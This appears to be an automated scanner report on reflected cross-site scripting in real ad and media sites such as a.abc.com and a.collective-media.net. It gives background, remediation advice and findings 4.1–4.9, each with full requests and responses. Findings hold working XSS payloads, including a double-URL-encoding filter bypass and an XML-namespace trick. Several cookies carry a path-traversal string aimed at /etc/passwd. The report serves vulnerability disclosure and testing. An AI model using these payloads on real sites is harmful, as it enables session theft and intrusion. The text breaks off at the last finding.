- http://rt1302.infolinks.com/action/doq.htm [rid parameter]
- http://rt1302.infolinks.com/action/getads.htm [lid parameter]
- http://rt1701.infolinks.com/action/doq.htm [rid parameter]
- http://rt1702.infolinks.com/action/doq.htm [rid parameter]
- http://rt1803.infolinks.com/action/doq.htm [rid parameter]
- http://rt1804.infolinks.com/action/doq.htm [rid parameter]
- http://rt1901.infolinks.com/action/doq.htm [rid parameter]
- http://rt1903.infolinks.com/action/doq.htm [rid parameter]
- http://s19.sitemeter.com/js/counter.asp [site parameter]
- http://s19.sitemeter.com/js/counter.js [site parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]
- http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
- http://tps31.doubleverify.com/visit.js [plc parameter]
- http://tps31.doubleverify.com/visit.js [sid parameter]
- http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [clickData parameter]
- http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [name of an arbitrarily supplied request parameter]
- http://widgets.mobilelocalnews.com/ [uid parameter]
- http://www-01.ibm.com/support/docview.wss [aid parameter]
- http://www-01.ibm.com/support/docview.wss [name of an arbitrarily supplied request parameter]
- http://www-146.ibm.com/nfluent/transwidget/tw.jsp [cd parameter]
- http://www-146.ibm.com/nfluent/transwidget/tw.jsp [name of an arbitrarily supplied request parameter]
- http://www.bostonherald.com/includes/processAds.bg [companion parameter]
- http://www.bostonherald.com/includes/processAds.bg [companion parameter]
- http://www.bostonherald.com/includes/processAds.bg [page parameter]
- http://www.bostonherald.com/includes/processAds.bg [page parameter]
- http://www.bostonherald.com/includes/processAds.bg [position parameter]
- http://www.bostonherald.com/includes/processAds.bg [position parameter]
- http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
- http://www.disenter.com/search.php [searchString parameter]
- http://www.disenter.com/search.php [searchString parameter]
- http://www.google.com/search [tch parameter]
- http://www.jcp.org/en/home/index [REST URL parameter 3]
- http://www.jcp.org/en/home/index [name of an arbitrarily supplied request parameter]
- http://www.jcp.org/en/jsr/detail [id parameter]
- http://www.jcp.org/en/jsr/detail [name of an arbitrarily supplied request parameter]
- http://www.kaltura.com//api_v3/index.php [1%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [1%3AentryId parameter]
- http://www.kaltura.com//api_v3/index.php [1%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [2%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [2%3AentryId parameter]
- http://www.kaltura.com//api_v3/index.php [2%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [3%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [3%3AentryId parameter]
- http://www.kaltura.com//api_v3/index.php [3%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [4%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [4%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [ks parameter]
- http://www.kaltura.com//api_v3/index.php [name of an arbitrarily supplied request parameter]
- http://www.kaltura.com//api_v3/index.php [service parameter]
- http://www.open.com.au/cgi-bin/sf.cgi [config parameter]
- https://www.open.com.au/cgi-bin/sf.cgi [config parameter]
- https://www.open.com.au/onlineorder.php [name of an arbitrarily supplied request parameter]
- http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
- http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
- http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
- http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
- http://www.westhost.com/images/bluegradbg.gif [REST URL parameter 1]
- http://www.westhost.com/images/bluegradbg.gif [name of an arbitrarily supplied request parameter]
- http://www.westhost.com/images/boxtopbackground.gif [REST URL parameter 1]
- http://www.westhost.com/images/boxtopbackground.gif [name of an arbitrarily supplied request parameter]
- http://adnxs.revsci.net/imp [Referer HTTP header]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [Referer HTTP header]
- http://livechat.iadvize.com/chat_init.js [Referer HTTP header]
- http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
- http://www.westhost.com/images/bluegradbg.gif [Referer HTTP header]
- http://www.westhost.com/images/boxtopbackground.gif [Referer HTTP header]
- http://3ps.go.com/DynamicAd [tqq cookie]
- http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p110620504 cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]
- http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [ZEDOIDA cookie]
- http://livechat.iadvize.com/chat_init.js [vuid cookie]
- http://s19.sitemeter.com/js/counter.asp [IP cookie]
- http://s19.sitemeter.com/js/counter.js [IP cookie]
- http://www.websitealive2.com/89/visitor/vTrackerSrc_v2.asp [wsa cookie]
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
- Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
- User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
4.1. http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]
Summary
Severity: High
Confidence: Certain
Host: http://a.abc.com
Path: /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js
Issue detail
The value of REST URL parameter 5 is copied into a JavaScript inline comment. The payload aa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d was submitted in the REST URL parameter 5. This input was echoed as aa5fa*/alert(1)//0f95b5b210d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.jsaa5fa%252a%252falert%25281%2529%252f%252f0f95b5b210d?cb=v9.00 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 145111
Content-Type: text/javascript
Last-Modified: Sat, 17 Sep 2011 01:02:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:02:31 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=272
Date: Sat, 17 Sep 2011 01:02:32 GMT
Connection: close

/**
 * @filepath: ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleteraa5fa*/alert(1)//0f95b5b210d
 * @created: Fri, 16 Sep 11 18:02:32 -0700
 */
/**
 * @filepath: /utils/jquery.ifixpng2.js
 * @created: Fri, 16 Sep 11 18:02:31 -0700
 */
;(function($){$.ifixpng=function(customPixel){$.ifixpng.pixel=cu
...[SNIP]...
4.2. http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.abc.com
Path: /service/sfp/omnitureconfig/
Issue detail
The value of the pageURL request parameter is copied into the XML document as plain text between tags. The payload f23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 was submitted in the pageURL parameter. This input was echoed as f23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Request
GET /service/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angelsf23fc<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>8491a57dfb1 HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Content-Length: 1037
Content-Type: text/xml
Last-Modified: Sat, 17 Sep 2011 01:03:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed04
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 02:03:32 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=279
Date: Sat, 17 Sep 2011 01:03:31 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<omnitureProfile account="wdgabccom" visitorNamespace="abc" trackingServer="w88.go.com" trackingServerSecure="sw88.go.com" dc="112">
<param id="prop13" value="
...[SNIP]...
<param id="pageURL" value="http://beta.abc.go.com/shows/charlies-angelsf23fc<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>8491a57dfb1" enabled="true" />
...[SNIP]...
4.3. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.rev_bostonherald/
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f413'-alert(1)-'1042a85aca3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:57 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:57 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL;
if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald2f413'-alert(1)-'1042a85aca3/;sz=728x90;net=cm;ord=%23PCACHEBUSTER;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
4.4. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://a.collective-media.net
Path: /adj/cm.rev_bostonherald/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9849'-alert(1)-'3c99bede0bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:55 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:55 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?&b9849'-alert(1)-'3c99bede0bf=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.5. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/cm.rev_bostonherald/ |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3030f'-alert(1)-'78b5323d0b7 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/cm.rev_bostonherald/;sz=728x90;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:48:47 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1cb6ad6c2dd07ed8; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:48:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/cm.rev_bostonherald/;sz=728x90;net=cm;ord=%23PCACHEBUSTER?3030f'-alert(1)-'78b5323d0b7;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.6. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86817'-alert(1)-'7a10fc56168 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 17 Sep 2011 01:13:10 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:10 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald86817'-alert(1)-'7a10fc56168/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.7. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3b3a'-alert(1)-'ebe641e9daf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;ord=%23PCACHEBUSTER? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:16 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:16 GMT
Content-Length: 482

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audiencea3b3a'-alert(1)-'ebe641e9daf;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.8. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/iblocal.revinet.bostonherald/audience |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 787bc'-alert(1)-'bb972807ee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/iblocal.revinet.bostonherald/audience;sz=160x600;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Date: Sat, 17 Sep 2011 01:13:02 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:13:02 GMT
Content-Length: 485

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer; var cmifr = (self==top ? '' : 'env=ifr;'); document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience;sz=160x600;net=iblocal;ord=%23PCACHEBUSTER?&787bc'-alert(1)-'bb972807ee4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?"> ...[SNIP]...
4.9. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]
Summary
| Severity: | High |
| Confidence: | Certain |
| Host: | http://a.collective-media.net |
| Path: | /adj/iblocal.revinet.bostonherald/audience |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48284'-alert(1)-'1a524591d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
